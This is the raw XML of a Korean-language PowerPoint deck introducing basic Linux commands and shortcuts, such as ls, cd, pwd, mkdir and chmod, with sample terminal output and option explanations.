        <p:nvSpPr>
          <p:cNvPr id="11" name="화살표: 오른쪽 10">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CDE8BAB-00B2-4BDA-B805-8EEE028E48D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0CD6519-54BF-4CD2-923C-553F5BC09D9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5879023-5445-4050-9C77-8A7140650D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00A860FE-262B-4971-A50A-7621625949D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8A261CA9-BF7E-4999-9E76-CCE519FC96A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55328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체계 구성도</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E46BA5A1-DA53-4E65-BA89-47F367E48A2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1337960" y="1690688"/>
            <a:ext cx="4577435" cy="4971502"/>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DBB36A63-067F-479E-92E8-85DE509813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2235CCB7-FDC2-47A7-BACD-2293F2EA35B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7125413" y="1690688"/>
            <a:ext cx="3728627" cy="4971502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="그룹 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5DFDD29-411C-4E76-8F88-CF79A38F2E4F}"/>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C2B6126-7B92-4FB9-844F-14594764D4C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6F65ADA8-7EC5-4C92-BEAA-C2ADBAA0A19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0F64A399-BD4E-4689-A549-39912A84B36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20969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기본 명령어</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54910453"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1694953" y="1791679"/>
          <a:ext cx="8802093" cy="4678934"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="388289">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>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gridCol w="429371">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="699377342"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1121134">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="438747241"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="290355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번호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base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기본 유용한 명령어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단축키</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grep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pwd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디렉토리 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>경로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 출력</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echo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경로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sort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ls</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목록 확인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sudo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mkdir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생성</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22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편집 도구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touch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날짜정보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트래픽 편집 도구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출력</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여러 개의 파일 합치기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파일이나 디렉토리를 삭제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ifconfig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mv</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디렉토리를 복사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매뉴얼 출력</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4"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head</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>/tail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파일을 보고싶은 줄 수만큼 보여준다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5"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find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특정 파일이나 디렉토리를 검색한다</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6"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chmod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권한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ps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실행중인 프로세스 목록</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7"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chown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소유자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kill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프로세스 강제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8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a: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chgrp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그룹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9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>16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cut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필드를 출력한다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batch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배치파일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미리 정의된 시스템 명령어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0" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>17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wget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21"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B839C42C-4F00-460F-838B-63871D2B138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06B09A53-8E05-4139-A8E0-9CFFE910EE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F7954BD-5F82-4B0A-A88E-19A6965B355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2" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07F86D2F-5C1B-4ACD-83AD-0D7B3AFEE6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247371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기본 유용한 명령어</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </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0" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6C339DA-5A96-4D76-BBDE-5C3A323AC2B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1134251311"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1694953" y="1791679"/>
          <a:ext cx="7984434" cy="4677221"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1126970">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2416196">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="875039">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="438747241"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="875039">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="524256649"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="269119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단축키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init</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 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Visual mode </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>로 진입한다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L</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화면 클리어</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row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--help</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 find --help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2">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명령어에 대한 설명을 볼 수 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Alt + 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Shift + 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종료</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Shift + F</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내에서 문자열 검색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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Pgup</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>Pgdn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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에서 스크롤 위 아래</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실행 중인 프로그램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Z</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실행 중인 프로그램 일시 정지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일시 정지된 프로그램 다시 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Tab</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자동 완성</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D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logout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로그아웃</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위 화살표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이전 명령어</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복사하기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Ctrl + V</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붙혀넣기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Alt F1 ~ F12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콘솔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Alt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한영 전환</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34565443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pwd</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현재 디렉토리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>경로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>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50097"/>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76743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47CF78D7-B18E-4382-B520-5CEE04C197E8}"/>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7" name="타원 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B158657-F38E-4C68-A9FD-CCFB6E13D379}"/>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8" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80F07B68-D1B4-484D-AA2A-7C07C5F73970}"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>(3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="직선 화살표 연결선 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68A5E407-9071-45B6-BB5C-D24793E19F84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17"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정보보호대학원 | 사이버국방학과 | 학과소개">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{901CEC74-A516-49F2-9585-853878CC1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732" y="1914168"/>
            <a:ext cx="4127654" cy="23218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고려대 사이버국방학과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5832F971-281D-46BC-A901-B98A0CAEE0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718" y="1669010"/>
            <a:ext cx="4781550" cy="325755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2FAD7E0E-E9BB-4FEE-8A02-026C7D915E64}"/>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66790C4-32EE-4937-A071-FF870FF4495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71E9176-6B46-47C0-85C9-C5D5063A1BE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BF12A068-FC2C-42AE-BAE8-D956AAE3980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815599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cd : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>경로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/var/log</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/var/log</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/root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C5258CC-2BE3-46CC-BCB2-A949506089B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CC395EC5-73B6-4374-91E9-D1D3A3749B69}"/>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8AE97F1-B0EA-4ECA-BEE7-E8374EEA4DC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8BBD819-6176-436A-BF8B-E84A51E51F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5C8ABC5B-4BB4-4509-8EB8-F6EDCEE7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892027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ls : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>디렉토리 목록 확인</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home]# cd /export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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>err</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>log  err</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>_url.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>txt  home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4096 10</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>29  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>2017 home</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-x 5 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> 4096  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>4 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>20:17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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>.  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>..  err</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>log  err</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>_url.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>txt  home  repo</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-al</a:t>
              </a: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4 20:17 .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>-x 25 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> 4096  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>22 14:37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4" y="1690688"/>
            <a:ext cx="5109379" cy="4940700"/>
            <a:chOff x="1196833" y="1885839"/>
            <a:chExt cx="3919995"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3" y="1885839"/>
              <a:ext cx="3919993" cy="22350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–S  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>파일 크기 순으로 정렬하여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알파벳 거꾸로 순으로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하위 디렉토리 까지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–h  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>: K(kilo), M</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>(mega</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>), G(giga) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>단위를 사용하여 파일 크기를 사람이 보기 좋게 표시한다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dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>lu</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>atime(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>접근 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>시간 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                <a:t>read.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
                <a:t>exec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>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–lc  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:  ctime(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>변경 시간 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>을 출력한다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.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al e*.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>g  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:  ‘e'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>로 시작하고 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>‘.g'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>로 끝나는 디렉토리 내용을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&gt; file.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>txt  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0" err="1"/>
                <a:t>리다이렉션</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t> 연산자</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>(&gt;, &gt;&gt;)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>를 사용하여 디렉토리 내용을 파일에 저장할 수 있다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="화살표: 오른쪽 13">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A2CD636-3646-4709-9F8D-1A6060A9790F}"/>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C054E3C-7B98-4768-9350-DF5975F42AE4}"/>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0F08332-6A95-4600-B4EF-7EEB03FE8B2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79ACC87-6990-458D-AECF-0634B7440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94289EC7-A06E-483B-9E6D-27B343D9710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96300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mkdir</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디렉토리 생성</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mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>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775 test3</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777 test4</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solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>8</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>drwxrwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>-x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solidFill>
